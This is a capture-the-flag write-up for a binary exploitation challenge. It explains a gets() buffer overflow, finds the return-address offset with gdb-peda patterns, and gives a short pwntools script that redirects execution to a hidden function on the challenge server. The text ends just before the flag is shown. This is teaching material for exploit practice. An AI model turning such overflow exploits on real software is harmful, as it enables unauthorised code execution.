- Category: Binex
- Points: 150
- Author: Wesley V
Congratulations, you've graduated from letters! Now, let's move on to numbers.
From the BCA Course Catalog:
Analysis I includes linear and quadratic functions, polynomials, inequalities, functions, exponential and logarithmic functions, conic sections, and geometry.
That's a lot of cool stuff! I think you'll have tons of fun learning about functions in this class!
The challenge page provides us with a binary and the C code it was compiled from.
Looking at the code, it becomes clear that the cheat
function is what we're after. And the vulnerability that lets us do that is yet another buffer overflow. The program uses gets to read our input into a 50 byte buffer.
The easiest way to figure out after how many bytes the return address is overwritten is to make use of a De Bruijn sequence. So I load the binary up in gdb with the peda installed because it has some useful helpers.
One of these helpers is pattern create [length]
, which generates a De Bruijn sequence for us. A length of 100 should do for our purposes;
Running the program afterwards and entering this pattern as input results in a segfault on the return
The address at the top of the stack is where our return address should be located. We can find the offset with pattern offset [pattern]
Now that we figured out where to store the return address it's time to get the address of the cheat
function. The intended solution was to read this from the output of the binary, because it prints the address to the console, but because the binary is not hardened with PIE
we can simply hardcode the address, making the script very straightforward. Running the executable once reports For example, here's a number: 4198998.
which is 0x401256
in hex.
from pwn import *
#p = process('./analysis')
p = remote('bin.bcactf.com', 49158)
offs_cheat = 0x401256
p.sendline(b"A"*72 + p64(offs_cheat))
which results in the following output:
It's math time, baby!
WOOO I love my numbers and functions and stuff!!
For example, here's a number: 4198998.
What do you think about that wonderful number?
> Numbeerrrrrs!
Anyways, we have a test coming up.
Be sure to study!
So the flag for this challenge is: